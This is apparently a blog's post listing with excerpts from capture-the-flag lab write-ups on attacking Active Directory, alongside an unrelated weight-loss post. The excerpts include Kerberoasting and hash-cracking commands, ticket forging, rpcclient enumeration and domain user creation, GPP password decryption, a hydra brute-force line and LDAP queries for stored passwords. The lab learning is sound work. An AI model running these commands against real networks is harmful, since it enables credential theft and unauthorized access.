Posts

Scrambled - HTB

Image
This is an Active Directory box based on the ports open. Navigate to the supportrequest page. We see two potential users exist: support and ksimpson . The domain scramblecorp.com can be added to the /etc/hosts file too. The username and password is ksimpson/ksimpson. We see NTLM is disabled based on this hard-to-read and easily-missed notification message. GetUserSPN.py is broken. Please fix with a local copy: https://github.com/SecureAuthCorp/impacket/issues/1206 impacket-getTGT scrm.local/ksimpson:ksimpson export KRB5CCNAME=ksimpson.ccache so impacket can use the ticket. hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt The password is pegasus60. Which fits for UCF right. Get a PDF document from samba. We can pass the ksimpson TGT ticket to login. smbclient.py scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip scrambled.htb -debug -k Next lets use ticketer.py. https://www.browserling.com/tools/ntlm-hash . Take Pegasus60 and get a NTL...

PG Mice

Image
I haven't seen these ports before. The agressive nmap scan doesn't give much information. I google the 1978 port. Since the box is called "Mice" and the exploit is called "RemoteMouse", it tips me off. I look into the exploit and see the SIN 15WIN NOP NOP text. This must be it. I edit the script and realize the issues are because this is python2. I run python2 expoit.py and it works. I download a faster exploit script too. I try multiple reverse shells and fail. I throw my hands up and do the "Give Up! Download netcat and use that instead!" step. I get shell on the box.

2 months and 17 pounds

Image
Weight Gain during the Pandemic I gained an extra 20 pounds during the pandemic. It happened within a month or two while I wasn't paying attention. I was blindsided. I woke up one day and didn't know how I got myself there. I've never lost weight successfully. I can maintain, lose a little, and that's it. Which is all I needed to do until 2020. Too Many Failures to Count I've been struggling with this for two years. I started and stopped many diets. I found the calories in/calories out method doesn't work for me. If I eat 1200 calories, I gain weight. If I repeat that over and over, I gain weight. The low calories made me feel hungry and weak. Maybe it works for men. I tried working out a lot. This just made me gain too. I could walk/run 20-30K steps and gain weight. I wasn't eating that bad either. I ate whole food vegetables and fruits. It worked for the first 4 pounds and stopped. I'm already a vegan. I tried intermittent fasting...

RPC: It's Actually Useful Jutsu

Image
Where have I seen RPC be useful? Need to collect usernames to brute-force. Request a TGS-Ticket by username ONLY: AS-REP Kerberoasting A password was left in the AD User Description https://www.hackingarticles.in/active-directory-enumeration-rpcclient/ 1. Login with RPC rpcclient -U "" -N 10.10.10.161 1. enumdomusers 2. queryuser queryuser svc-alfresco 3. enumdomgroups and querygroup enumdomgroups querygroup 0x200 querygroupmem 0x200 (get the group member IDs) 4. Get Password Info rpcclient $> getdompwinfo min_password_length: 7 password_properties: 0x00000000 5. Create a User (Need priv) createdomuser hacker setuserinfo2 hacker 24 Password@1 enumdomusers

Active HTB Active Directory

Image
smbget -R smb://anonymous:anonymous@10.10.10.100/Replication Run smbget to retrieve all the files. Find Group.xml located in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Group.xml Run gpp-decrypt on the cPassword hash. Logging in is not working. However kerberoasting and secretdump can still work. Trying Stuff Out (Not related to solving this box) Nice little sambaserver trick works when downloading fails ^ Lessons Learned See SYSVOL? Have access to SYSVOL? Older box? GPP Password Decryption may work. Group.xml is the file to look for. Used kerberoasting. GPP good for pre and post exploit. Found smbget command.

PG Hutch: Active Directory

Image
I was stuck on this box for two days. My MiTM attacks did not work. Traffic is dead. Restarting the box usually triggers the IPv6 poisoning MiTM. Does not work. Next step is Samba exploits. No vulns there. Which leaves us to 'what next'? This is a great box to collect more enumeration skills and attack vectors. The obvious WebDav keeps screaming at me. It has a BasicAuth on it. I find out you can enumerate users with Kerbrute. I try that. I get "admin" (custom) and "Administrator" (default). I don't know how to brute BasicAuth. I google "how to brute WebDav" which is a bad google. I corrected to "how to brute BasicAuth". I get a hydra command. I run that against multiple password lists with the user "admin". No luck. IT WOULD however work, and is good to keep for the future. hydra -l fmcsorley -P passwords.txt 192.168.210.122 http-get / -I Follow these two articles when enumerating LDAP: https://book.hac...

Attack Active Directory: Enumeration

Image
MITM and Samba exploits not working? 1. Kerberos Username Enumeration Download Here: https://github.com/ropnop/kerbrute/releases . Install, chmod the file, thats it. 2. LDAP Enumeration Check out: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap and https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ >>> import ldap3 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) >>> connection = ldap3.Connection(server) >>> connection.bind() True >>> server.info >>> connection.search(search_base='DC=vault,DC=offsec', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') >>> connection.entries >>> connection.search(search_base='DC=htb,DC=local', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') >...